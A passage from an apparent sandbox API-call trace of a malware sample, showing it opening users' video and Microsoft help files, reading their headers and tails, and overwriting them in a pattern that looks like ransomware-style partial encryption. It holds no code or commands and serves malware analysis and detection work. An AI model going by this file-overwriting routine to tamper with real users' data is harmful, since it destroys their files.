lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.692] CloseHandle (hObject=0x1dc) returned 1 [0180.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\TnAYtjaO1km-ssfseS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\tnaytjao1km-ssfses.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.693] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.693] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10f39 [0180.693] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.693] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.693] ReleaseMutex (hMutex=0x168) returned 1 [0180.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TnAYtjaO1km-ssfseS.mp4", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0180.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TnAYtjaO1km-ssfseS.mp4", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TnAYtjaO1km-ssfseS.mp4", lpUsedDefaultChar=0x0) returned 22 [0180.693] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.694] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xff39 [0180.694] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.695] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xff39 [0180.695] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.698] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.698] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.698] CloseHandle (hObject=0x1dc) returned 1 [0180.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\jO0-BJUql8y34Fqm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\jo0-bjuql8y34fqm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.699] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.699] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14ef4 [0180.699] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.699] ReleaseMutex (hMutex=0x168) returned 1 [0180.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jO0-BJUql8y34Fqm.flv", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jO0-BJUql8y34Fqm.flv", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jO0-BJUql8y34Fqm.flv", lpUsedDefaultChar=0x0) returned 20 [0180.699] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.700] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x13ef4 [0180.700] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.701] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x13ef4 [0180.701] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.701] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.701] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.701] CloseHandle (hObject=0x1dc) returned 1 [0180.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\0YdBLRdk.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\0ydblrdk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.702] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.702] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xce31 [0180.702] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.702] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.702] ReleaseMutex (hMutex=0x168) returned 1 [0180.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0YdBLRdk.swf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0YdBLRdk.swf", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0YdBLRdk.swf", lpUsedDefaultChar=0x0) returned 12 [0180.702] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.703] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xbe31 [0180.703] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.703] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xbe31 [0180.704] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.704] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.704] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.704] CloseHandle (hObject=0x1dc) returned 1 [0180.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VCTy8br4l.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcty8br4l.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.705] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.705] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x144e [0180.705] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.705] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.705] ReleaseMutex (hMutex=0x168) returned 1 [0180.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTy8br4l.mkv", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTy8br4l.mkv", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VCTy8br4l.mkv", lpUsedDefaultChar=0x0) returned 13 [0180.705] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x144e, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2d5f2bc*=0x144e, lpOverlapped=0x0) returned 1 [0180.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.706] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x19d6, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f2d0*=0x19d6, lpOverlapped=0x0) returned 1 [0180.706] CloseHandle (hObject=0x1dc) returned 1 [0180.707] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.707] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.707] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x79f1a [0180.707] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.707] ReleaseMutex (hMutex=0x168) returned 1 [0180.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MTOC_help.H1H", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MTOC_help.H1H", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help_MTOC_help.H1H", lpUsedDefaultChar=0x0) returned 18 [0180.707] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0182.136] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x78f1a [0182.136] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.138] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x78f1a [0182.139] WriteFile (in: hFile=0x1dc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.139] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0182.139] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0182.140] CloseHandle (hObject=0x1dc) returned 1 [0182.140] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.140] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x2d5f690*="watermark.png") returned 0x65 [0182.140] GetLastError () returned 0x5 [0182.140] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0182.140] LocalFree (hMem=0x69e2b0) returned 0x0 [0182.140] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.140] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0182.141] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0182.141] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0182.141] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png")) returned 0x20 [0182.141] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x70e [0182.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.141] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.142] ReleaseMutex (hMutex=0x168) returned 1 [0182.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0182.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx.hxn", cchWideChar=6, lpMultiByteStr=0x1f7a834, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx.hxn", lpUsedDefaultChar=0x0) returned 6 [0182.142] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x70e, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x70e, lpOverlapped=0x0) returned 1 [0182.142] CloseHandle (hObject=0x1dc) returned 1 [0182.142] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.142] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.142] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6f8 [0182.142] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.143] ReleaseMutex (hMutex=0x168) returned 1 [0182.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0182.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x1f8fc6c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0182.143] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x6f8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x6f8, lpOverlapped=0x0) returned 1 [0182.143] CloseHandle (hObject=0x1dc) returned 1 [0182.143] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.143] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.143] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6f2 [0182.143] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.144] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.144] ReleaseMutex (hMutex=0x168) returned 1 [0182.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0182.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fc6c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0182.144] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x6f2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x6f2, lpOverlapped=0x0) returned 1 [0182.144] CloseHandle (hObject=0x1dc) returned 1 [0182.144] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.144] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.144] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6e6 [0182.144] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.144] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.145] ReleaseMutex (hMutex=0x168) returned 1 [0182.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 